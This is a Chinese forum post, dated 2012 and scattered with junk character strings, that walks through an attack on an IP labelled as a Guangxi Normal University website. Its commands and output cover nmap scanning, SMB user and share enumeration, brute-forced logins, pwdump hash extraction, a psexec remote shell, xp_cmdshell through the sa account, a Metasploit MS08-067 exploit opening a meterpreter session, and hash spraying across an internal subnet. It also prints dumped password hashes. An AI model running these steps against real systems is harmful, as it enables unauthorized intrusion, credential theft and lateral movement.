广西师范网站http://202.103.242.241/9 Q+ N) I: t0 e
2 T1 T1 E/ h: i' f, m7 L+ A
root@bt:~# nmap -sS -sV 202.103.242.241
X, c9 I4 j( w& W
/ ]: o/ `) ^% M+ Y6 o# z) ^Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST+ Y; j* a6 l" A& ]8 U: c# L4 ^
& B; E2 J+ b: |, l' C
Nmap scan report for bogon (202.103.242.241)0 Q9 F( ?- x- v+ G; X+ w; p% T
) W0 x- y$ \" P# N- sHost is up (0.00048s latency).
& v- _5 d; t9 k5 E& e! u8 _$ y5 S4 _1 c- T/ y1 ^
Not shown: 993 closed ports; U" b3 d: q0 Q1 w/ i
! G& ]# y( m+ k7 p' ~4 ^
PORT STATE SERVICE VERSION
! L8 M* ?, Y2 \1 c, p! k$ V7 x0 U7 B7 N0 h
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
/ k. O& N+ w% F' x% `6 Y! a% J$ t- ?# N4 n5 L. v: }
139/tcp open netbios-ssn
( s3 ]9 h3 f- v8 `' d# F
8 D6 J+ S% L; Y, O; b445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
9 l8 x7 S' I/ ]7 J
: T0 _1 ^, i: `! M( t8 m3 ] R1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
3 T, L2 L8 \% u/ a0 r+ u$ R+ o3 K# K/ S
1026/tcp open msrpc Microsoft Windows RPC
. o+ n2 x9 o: D# v6 Q1 d) S% Y7 H
3372/tcp open msdtc?
8 P d& `3 l2 D3 J& I2 z- l2 o, e$ \
3389/tcp open ms-term-serv?" {/ n& s, w$ w
; |" Z" O5 W# F$ \! G" O
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :5 H6 `5 O- R+ T u5 M y
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r5 n, ^/ E1 {, [4 n5 [' a% e9 Q" P. X
3 e# |) d, J+ I I3 h) ~# @SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions# X4 D% D1 w$ J3 u- n
% s+ T9 x! `+ U3 y+ dSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
3 x) i. t$ P% T" U$ J; J2 P; x7 \& u! N" K- g. Q
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
( \: {: N( L4 a
3 e" `+ _ l: k+ tSF:ptions,6,”hO\n\x000Z”);
5 z* p6 {; a5 r% W
; Q3 {; g' w: [* k- I/ _% [MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
+ n; _+ f9 q$ `) V+ i& ^" n. [7 `
Service Info: OS: Windows- Q+ W3 L5 R# ~
8 M5 |3 c2 U8 l2 U. Z* c9 ~Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .7 v9 S0 Z E6 t/ K+ u
, R* L! h: m1 c* g
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
; Z9 |) ~. O6 m3 c, _7 T
2 ]. j H: H8 t* P/ Iroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
2 k6 f! y- ]+ J! n. S8 F
# }* |9 C# r# K# y3 Q3 @, ?-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse3 A* D7 q# L: O- ^% J0 \
9 F* K5 w+ [1 o% c9 Q; Z
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
- i: R. e* o D6 i2 M I, j2 e& R) `2 W+ u- A9 r
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse" ]- B" {" V1 d& h2 j' p/ v) s4 h$ F: I
1 F* T6 L0 m) M: V. I
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse: B! B6 G C( `* j, E( f- J3 J4 h
- U" D; W! y4 v7 e& n. P1 U. u) }4 L
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
- e' I7 E: I$ ^" [2 x( p/ ?4 c+ G+ m: v9 L1 N+ `" t0 G
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse% ]4 ^- w" e2 O. y& |$ |3 W3 _0 W
- o" T* R, @6 F: P
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
5 p5 a# ^: W7 e; }6 o+ `& t3 ^2 b
2 q" ~* o" v3 q! X: V1 }-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
) X) }, W# J$ C+ R) s: z7 {! \9 Z; ~0 k( o* F
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse' J2 l1 }6 R9 y$ `) _8 g& j& P% H
, _2 T1 f/ b2 j ^$ D# a& h4 z-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse* z( V0 c' x, y4 Z& ?/ e5 v
w0 B3 r+ U+ t' r/ g$ ^-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse4 p5 n7 k: W: O5 H0 W
5 o0 r- [5 ^7 c- l-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse5 c# \: m8 v" B) j( |
$ r2 K; P0 N4 o: A
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse6 Z+ @0 Z# J6 Y6 M$ w
3 B) n" O. A. N& D/ ?$ s& r/ w
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse* W+ Q. m8 ?6 t W y
! y; w9 _! H4 C2 ]& c" Z-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
- ~% F, Z q0 E, T2 T+ N z: w2 X4 R/ ?) ^- [ y# `
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
2 s* ?- c1 @! y# j+ n( i( c
3 } U* \! B+ \//此乃使用脚本扫描远程机器所存在的账户名
6 q0 p( f) {' t* G( ~! h, y6 ]
/ g3 D+ Z, b+ J/ `7 v( z% _! EStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
2 k' u4 ^8 {5 n; U. C. o
. V: r, W" s9 O2 NNmap scan report for bogon (202.103.242.241); F( O/ m. h }4 O) D
4 J. e e. K& ?! a" p
Host is up (0.00038s latency).
8 r' D" B1 ~3 W
, x7 [: |9 [, w( Q! i9 XNot shown: 993 closed ports
$ |$ w9 s8 w; T1 K# `' y
" u2 L' E2 G, ]3 Y0 T# @, SPORT STATE SERVICE0 q! S! r8 R& f E' U Q" B2 m% r
% l1 _7 Y: _0 {& f: b/ ]135/tcp open msrpc
' S+ V: y+ a( B' M2 k) K% c
; d' I* B4 O. J$ a139/tcp open netbios-ssn
# Q( ]' R. {* K/ f% }* r5 g9 M, ?0 D3 M4 \( J: a [
445/tcp open microsoft-ds
0 e8 [, L) O# {" _: Y* r" Q1 m' F% y! b' G+ X( Q
1025/tcp open NFS-or-IIS7 b+ @# V- @% B! m& N( |" R3 h
r% ~/ c( e' \1026/tcp open LSA-or-nterm
B+ ?" D$ T" {& ] |, H1 V3 a4 R- W& a( E7 Y
3372/tcp open msdtc
' o' X( D% J- X+ U" p- H9 Y, W1 c, l/ j. U
3389/tcp open ms-term-serv
k9 n% f# d& K; T( F. h, @
1 ?$ i' C* V5 P) `& g4 \' ^" \, tMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
. I" T9 L4 m% J, u# J4 Z+ g( U2 m. Z' s6 ^( x
Host script results:
' T8 T5 j9 s; h; ^9 z" }! c
/ A, r! t6 F. d* N9 F5 J2 Y* c/ @| smb-enum-users:8 R9 [: D! o- q# C( B
5 X- |+ C+ t: A& M+ q! d% J|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
8 Y/ q9 Y5 D" R6 g5 P' J2 i+ [1 m2 p# x) e! S
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
( o, Q% ^9 m o% j/ y9 |
0 h( ~5 L' |6 u) k- aroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
# o, h0 w. L) k) _4 K* E" P, Q- ^ c9 H8 t" Z2 b
//查看共享
2 ~8 b9 V3 n+ R4 S. a* b- S: ~0 s6 P" o
+ c" x- D r$ \2 m `Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
& t# r& p3 m+ v( ?$ C; g
9 k. j1 f g/ q. v. ^+ E; @Nmap scan report for bogon (202.103.242.241)
! q; C* V/ z6 V/ d! `7 O* X q- e1 s: Y% S1 x2 f
Host is up (0.00035s latency).& N% H" l0 N( H. m/ I$ B3 Y5 O1 R- g7 x
/ h% w, O' q6 V. U3 ~7 dNot shown: 993 closed ports, i2 o# ^' p, ~: g! @! S
2 z. Z& b- W2 X, G% _8 u# q
PORT STATE SERVICE; k/ _" ]& N* j1 Q. d
5 [- I/ u8 u- y. L+ I* ]" o4 H3 x135/tcp open msrpc
, Z8 P5 B7 H' g G+ A F$ c- P
$ V |. }, I$ V' C! `- {' g139/tcp open netbios-ssn! M$ t% _; y# `- i7 q q: |7 N
. {3 P# O0 H3 c" x445/tcp open microsoft-ds1 j& Z+ [3 V3 l/ o7 a
+ p) \0 L- X& X/ S: X8 t
1025/tcp open NFS-or-IIS
1 B" Y( x& ^0 _6 I/ N& ~: H8 C0 h( h1 ]! A' F2 ]( O2 K
1026/tcp open LSA-or-nterm
0 z+ K4 r! F) O3 T( c9 m$ l7 A5 [- h+ N6 |4 [8 c
3372/tcp open msdtc
g& Z% @0 G A' p* p" t- k* {; _* L8 [' X% `/ U
3389/tcp open ms-term-serv4 u: q1 @# e! K6 K
$ x: N2 _, y( @4 zMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
# ]/ C6 k0 H4 P. j. S% o' M* N4 a3 V: g, G6 `/ u
Host script results:
0 J! f* l/ v3 c* M# L7 N" Z
+ N! J: W" c2 [8 N( K8 a| smb-enum-shares:- _; h0 \; F# j* Q
8 y- Y5 C) b# \/ {1 p| ADMIN$) q0 J/ W7 s: ? h) G6 c
" o' v: D% x" A5 x. r| Anonymous access: <none>2 c8 E' _) d; p, J
; C- @% u5 T/ H6 N4 v- S
| C$. y, Q/ i, A- Y) p% U+ A$ z# B: Z0 k
, o: F% l9 [& S# V| Anonymous access: <none>' B+ M# t+ W1 i4 i1 o \1 Z
9 \5 e+ z$ K; S/ }8 [| IPC$ Q+ N5 ^7 J9 I
5 W ~$ J% E* U|_ Anonymous access: READ
6 x& n2 `# l3 P' e* e {7 K+ e! Y1 C M# a- [
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
% V4 u Q: v n! u
# F2 a2 g% l) O. l2 Nroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 0 z, s. w3 A0 B' C, ~5 z
" v8 _. n2 v, C) X! m* |1 q8 e//获取用户密码, A1 ?$ l( \8 l1 f8 p
) @, h; S# n. Q9 y& ?4 r' `Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST) l# F+ L7 n3 D2 d6 Q- W
0 h; i: c1 k0 x) \Nmap scan report for bogon (202.103.242.2418)
# e2 X1 B+ }) Q* f( E/ Q* C! C9 ~+ N) @$ B
Host is up (0.00041s latency).; `. K" f/ u S8 U
! A' u* ~- A$ P$ TNot shown: 993 closed ports3 S8 q/ p" q" I: l
4 ]- n7 H0 G' A' R) O6 ~" H
PORT STATE SERVICE
: R0 X0 q& u6 X% j; A8 J9 r0 l% k. k7 a' f9 S6 X3 ~7 B
135/tcp open msrpc
7 U8 V8 m% j. q1 A; d+ ^6 \& W6 b* g7 n5 {
139/tcp open netbios-ssn) F* a. h# c m8 @9 O& }. d9 U0 C. [
* ~0 R0 S) Z1 ]$ L) y
445/tcp open microsoft-ds n3 u5 E& ?5 t9 k( \3 N
1 U, M$ ^; ~4 _9 a# }9 [! R) s
1025/tcp open NFS-or-IIS
7 ?+ ?5 O- B2 X/ q* [ s
/ P# z/ l$ y. S) e5 S1 T n" @1026/tcp open LSA-or-nterm6 l- G- F0 V' ?8 V5 s" n
E1 T3 V3 b) t7 @3372/tcp open msdtc
! w- w1 l4 Y6 H: g+ x1 f w/ X; X% c, [
3389/tcp open ms-term-serv+ e5 X# B0 Q7 H! `; M- n' q
2 X5 \1 ?7 h! L1 r
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
% s; b. {; \- v2 c- |/ b4 G
2 w0 O3 W, v. V) D7 LHost script results:
6 d, I; m4 e5 B6 {% v* o: V% v+ T. I1 ]1 |
| smb-brute:0 t- a# z# s7 c7 j/ ?9 I
0 y! ?- [; B; f- P3 p Yadministrator:<blank> => Login was successful
7 v5 f0 F" m& n: _& |
2 B8 C" h5 u J+ C& M: `6 j# c4 ~|_ test:123456 => Login was successful
: x6 @6 y9 Q$ I0 i! _( Y6 o
; a5 @: @$ F- MNmap done: 1 IP address (1 host up) scanned in 28.22 seconds. t- g% b9 T' D
) N6 t. a- M+ h: t. k, s2 d
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash% y$ y! w5 h; @& k/ K0 D5 u
* k: o1 ~5 o$ r. r* g M% k jroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data% i, [( {! Y* s8 y. h" N; N
6 D6 H& J) S' C( p0 r1 r% N
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse: W/ h& r- q* D# r! U& G
! X* l( `8 w2 N, x
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
; R- }4 C" { T
: ^4 f v( p) @8 Q2 z PStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST! }. L( e3 G/ Q6 @+ _
, d& K; ^3 N, _0 F( pNmap scan report for bogon (202.103.242.241)
! d* d: `6 P9 {- o2 h* o+ B* t, j/ o; @- f/ w# |4 {
Host is up (0.0012s latency).
; I8 P/ T- j/ B5 `3 ~- `+ M9 A$ U4 ]: y. o& C
PORT STATE SERVICE
7 d3 j0 r& Z, r, t0 e$ p2 K! _' |( J& {% W, x: k- A5 e8 n3 J
135/tcp open msrpc
3 W. ?8 y! }. R' R7 \9 y$ b, ]$ F1 I0 r2 [/ @6 o
139/tcp open netbios-ssn; B- }+ o# q* a1 A5 G: O
3 @, T: k! G2 p1 z445/tcp open microsoft-ds+ c& a! `4 K5 X
* P+ Z/ E9 X l: H$ o6 }9 R6 y
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
! z8 b6 x# D+ _* x0 Z5 H3 F- k3 ]# e, W
Host script results:
! p; @6 f T6 @2 p+ ~% P7 o7 G5 c1 ^: V) j# D" w
| smb-pwdump:
# z$ x# |* A. F& e' o( \) H/ |& C# w, u0 X9 }: B
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
$ x- G/ O* m% G1 g. m5 w/ ?0 M$ W! @! d) b3 {
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************3 Z+ Y, I; v+ W: C1 o( c6 l6 U
( ?! s O) r H* F/ K| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
1 ?$ b, e. R* _! Q7 [: z8 K4 n2 A1 n" \+ j( ^7 ], Y
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2& c4 t$ Y. Y" T, M
5 W3 E8 V; m$ n( ~4 p9 k
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
. Q7 G( {5 Q8 j) S# N+ z' P/ m$ K3 o# X$ ~* `; Y5 D$ L9 k
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
; R5 J1 h- N' |. ?/ l+ K
' P# C/ t: \. W% ~' x-p 123456 -e cmd.exe( L5 v. y% ^; z) e2 Z
1 w3 v$ e0 Z9 k! J6 S+ k: u
PsExec v1.55 – Execute processes remotely2 _$ a# u0 Q! u5 S/ I* ]
% W O# O; e* Q) C; P
Copyright (C) 2001-2004 Mark Russinovich7 i3 E$ F' C* T( m, f* U% W
. I" y% T- g3 U: U wSysinternals – www.sysinternals.com
) Z6 U, x) B7 v5 j# _) T" [9 ]# F" B1 i A5 P1 ]
Microsoft Windows 2000 [Version 5.00.2195]( M* ^& q7 X3 B+ \
$ O# h3 Z+ F) Y% B: ^: J; E(C) 版权所有 1985-2000 Microsoft Corp.) q# h3 u4 x$ n) w* p5 V
1 ~% g! K; J* R6 n- s' ]5 j, Y6 XC:\WINNT\system32>ipconfig6 a$ F' g, o; q. v4 j
`7 T( m' o/ E4 X+ w
Windows 2000 IP Configuration6 I1 ^+ a6 o: P/ h
9 b( q1 |! \3 W+ w! } PEthernet adapter 本地连接:9 d" c. g0 [+ K# ~+ i3 y* V
5 z" C0 n, j$ P9 {Connection-specific DNS Suffix . :
3 p% j' u) l7 { ~ f# R
% S# `/ {5 Y3 zIP Address. . . . . . . . . . . . : 202.103.242.241& M' t0 r" c9 ]" W2 }
8 G2 `0 L9 b/ tSubnet Mask . . . . . . . . . . . : 255.255.255.0
" R2 z6 r* W( ^1 L& x9 R
3 F5 o% f' O. f* g2 vDefault Gateway . . . . . . . . . : 202.103.1.1
5 Z" m- L$ k" j& c% d5 [% Z K5 ~) U" x& a, b* ^
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
* b8 M6 g. ?* Z
. H( |, j& |+ f8 K0 ?' Y7 @root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
4 f" Q C, J) L) B: h. l) R% X, O9 I
9 h/ S6 d% T5 ^2 E8 o9 O( WStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
' Q6 x3 W3 A' Q' F% g/ z. C% F9 @$ |4 R4 M7 r3 F6 @) S
Nmap scan report for bogon (202.103.242.241)7 o" ~, q; v0 S5 M* ]
" k& z# o) O, r' sHost is up (0.00046s latency).: \3 d) B. d& S. g
- ^. \) N( s5 J, B0 R% nNot shown: 993 closed ports' @& P) t6 f* y* I t
( g7 `4 ]; G: W) D- x1 H. q$ T& J, Q
PORT STATE SERVICE: \3 \) q$ ?! u# j$ W; T
7 F3 f" i: d1 T+ ]) V135/tcp open msrpc
4 f% a+ h7 l3 I7 L! q: v1 e
+ ?, z1 ?" E* A2 x; b" P. m139/tcp open netbios-ssn
! A; w. ^( D# r8 p: ]9 V! r4 I$ [2 E8 d5 Q% I3 H) m$ j" v
445/tcp open microsoft-ds
; ^) w, a: o6 P% m( @+ ~2 s6 A, b3 H- O/ {
1025/tcp open NFS-or-IIS7 y( l' _6 ]3 v' m# h9 k
1 Z5 F; m; p& S2 M8 ~# E
1026/tcp open LSA-or-nterm( {. Y4 g1 z" h. W0 C: @* n! y
; C q9 j/ C, d3372/tcp open msdtc9 T7 D: b# }$ d$ d
' ?, P9 k2 L6 c; M3389/tcp open ms-term-serv
4 G: e) P3 x4 \5 ] p( j5 C& R; O; M
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)% M" O4 {4 |) V( [ u
0 |9 N! x, r: u r6 y
Host script results:
; O! C8 g0 ]9 J* q9 j" y& V
+ Q* R& P3 G1 s3 D| smb-check-vulns:, ~, O7 S* ~$ y* _; Y6 \3 i
8 |( S5 c y, C# s4 p|_ MS08-067: VULNERABLE
* \7 f7 O0 U+ I0 r
" L0 @9 v' U' }9 B! n" \; t3 qNmap done: 1 IP address (1 host up) scanned in 1.43 seconds( m5 `3 i. D# W7 s A6 D$ q
. K, d0 U; d! jroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出$ ^1 i5 N# P! c5 j% I" ]( R
V |9 I6 e9 E7 w, o/ w# m3 Cmsf > search ms08
+ I: F7 E: a8 _% k3 ?5 H, H
0 i# N' R- S* ]msf > use exploit/windows/smb/ms08_067_netapi
* A5 `$ j' a' P: A4 O4 _* H r. G7 k& q" G
msf exploit(ms08_067_netapi) > show options6 i' a4 T2 s1 C: [( K1 ?! X
. c: k% |0 G# c0 Cmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
0 m& q. W! O' |: J1 V/ ~% U" R. \/ q; Q7 f, |1 h `: p. Z
msf exploit(ms08_067_netapi) > show payloads
* W. c1 a8 k/ m2 _, J; P
9 }0 W% H; X' a4 l' dmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
9 M, _& s. V( r. n: u/ `6 U- ^' \3 _1 @6 q( N
msf exploit(ms08_067_netapi) > exploit
! U. P" R# S8 a. [
, ?* z/ X/ _# j5 X5 n5 g0 Umeterpreter >
: G. l4 S3 L% q/ r; L' L! ^/ }; F( ~* g: S* P3 K
Background session 2? [y/N] (ctrl+z)- H1 x, H, z$ n, P" {$ K* H
5 V! C/ C% b4 J! b( |& Z! X/ d* ?; v8 {, S
msf exploit(ms08_067_netapi) > sessions -l- c& _4 C# q# I8 j
x5 y3 T$ p) |) K; r: ?) j0 B
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
& e9 H$ D6 r! W2 }
/ y9 y$ C! v! a5 D: Stest Y! i% _, t. M) b: h$ J
3 T( v8 i Q! _' k6 q( B' s B; oadministrator
& q8 ^, f1 f& z) c! V& |# B R8 O6 F5 y" d( ]* J
root@bt:/usr/local/share/nmap/scripts# vim password.txt; p7 e* S1 k1 `( T% N
5 {& \* c6 W. N- W: H. C. _+ r
44EFCE164AB921CAAAD3B435B51404EE$ V5 b4 X/ [4 W* M O) u+ S& n& b I0 g
4 j7 o" F/ G8 [0 N2 j( ~( t8 f. t3 {
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 r9 v# z# k! L1 u3 Q
# L7 l- B; o9 v //利用用户名跟获取的hash尝试对整段内网进行登录8 [$ | m$ L. Z) f5 A
* j' F* o% @& S( a @6 M7 Z: S
Nmap scan report for 192.168.1.1054 i, G W+ z4 D1 a: ?$ E9 i
! h$ e0 S; t8 U2 HHost is up (0.00088s latency).
7 u, o* N! n" @' X3 M8 F' J1 t2 m: t, z8 E/ U; M, g1 g* X; p5 ] I$ {
Not shown: 993 closed ports; m0 D) c" N- ]
; B9 n* V& E' J- L$ h
PORT STATE SERVICE
8 H1 Y: b' _9 B' |( l3 e. W! v% i/ R& B4 u- }! R! k1 _
135/tcp open msrpc) \ _ p2 L, S# [$ @8 H$ R
& `# y' o2 ]2 d+ R. @8 v0 U4 I
139/tcp open netbios-ssn
" h( }) }; L2 O( |
( N. l; h; m! E4 B1 H0 l) M& q445/tcp open microsoft-ds
8 Y. S7 ]! ^% c' h8 |$ i' ]+ ~5 b9 \6 r
1025/tcp open NFS-or-IIS/ a) ~! W' u' w4 p- L% N( h0 p. i3 g
O& }- I4 W% a; l
1026/tcp open LSA-or-nterm
3 w/ N3 |" q4 m) ]! k- f& L- j$ f/ R% i/ }3 G$ u
3372/tcp open msdtc8 P/ z+ Y$ x) _9 v
" [6 ^ h" K# c7 |3389/tcp open ms-term-serv8 p5 R, a! }2 q; v. w7 n2 K' P* W
" E$ T+ t4 W- B6 W4 ^' t. X; h
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)3 `$ O1 T: j6 @/ {5 q& S
! L' T. ~; ~6 g0 m2 E- W
Host script results:$ @2 P" T* K! ~# C
6 ~2 Z- w. l: Y- q4 @) A| smb-brute:/ z! L1 A* V" H+ y5 l/ \" u) H0 ~/ v
! ?! g2 P0 K' p, k
|_ administrator:<blank> => Login was successful
- F$ V' `: b: [3 a% Q+ ^
. r; b8 i7 j7 R* p; \* j0 v攻击成功,一个简单的msf+nmap攻击~~·
( t( L0 I6 J: j2 V, d
6 \, a, H& m3 @4 d. z( N |
发表于 2012-12-4 12:46:42
收藏
支持
反对